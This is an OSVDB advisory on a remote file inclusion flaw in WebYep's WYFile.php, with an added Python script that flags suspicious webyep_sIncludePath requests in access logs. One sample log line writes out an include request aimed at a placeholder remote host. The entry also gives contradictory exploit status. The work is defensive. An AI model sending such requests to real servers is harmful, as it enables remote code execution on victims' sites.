OSVDB ID: 29647

Title: WebYep WYFile.php webyep_sIncludePath Parameter Remote File Inclusion

Dates

Disclosure: Oct 09, 2006
Discovery: Oct 05, 2006
Exploit: Unknown
Solution: Unknown

Description

WebYep contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to WYFile.php not properly sanitizing user input supplied to the webyep_sIncludePath variable. This may allow an attacker to include a file from a remote host; any commands that file contains will be executed by the vulnerable script.
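An added detection sketch, not part of the OSVDB entry or of WebYep's code: because the flaw is reached by supplying webyep_sIncludePath in a request to WYFile.php, this scans web access logs for requests that set that parameter and grades values that point at a remote host higher. The log lines, the `/PLACEHOLDER/` directory and the combined log format are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "webyep_sIncludePath"   # parameter named in the advisory
SCRIPT = "WYFile.php"           # script named in the advisory
# Values that steer an include away from a local relative path:
# a URL scheme (http:, ftp:, php:, data:, ...), a protocol-relative //, or a UNC \\ prefix.
REMOTE = re.compile(r"^(?:[a-z][a-z0-9+.-]+:|//|\\\\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return None, 'param-set' or 'remote-include' for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/" + SCRIPT.lower()):
        return None
    # parse_qs percent-decodes, so http%3A%2F%2F... is compared in decoded form.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if any(REMOTE.match(v.strip()) for v in values):
        return "remote-include"
    # The include path should never come from the client, so any use is worth review.
    return "param-set"

def scan(lines):
    """Return (line_number, verdict) for every line that sets the parameter."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation address ranges, placeholder directory).
SAMPLE = [
    '203.0.113.7 - - [09/Oct/2006:10:01:02 +0000] "GET /PLACEHOLDER/WYFile.php'
    '?webyep_sIncludePath=http%3A%2F%2Fhost.example.invalid%2Fa.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [09/Oct/2006:10:02:10 +0000] "GET /PLACEHOLDER/WYFile.php'
    '?webyep_sIncludePath=../lib HTTP/1.1" 200 300',
    '192.0.2.9 - - [09/Oct/2006:10:03:44 +0000] "GET /PLACEHOLDER/WYFile.php?id=3 HTTP/1.1" 200 280',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE):
        print(f"line {number}: {verdict}")
```

Only the query string is inspected, since POST bodies do not appear in access logs; a hit on either verdict against a pre-1.1.10 install is a reason to check the host for unexpected files.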

Classification

Location: Remote / Network Access
Attack Type: Input Manipulation
Impact: Loss of Integrity
Exploit: Exploit Public
Disclosure: Vendor Verified
OSVDB: Web Related

Solution

Upgrade to version 1.1.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Products

Webyep

WebYep

1.1.9

References

Credit

  • the_day - the_dayecho.or.id -


Direct URL: http://osvdb.org/29647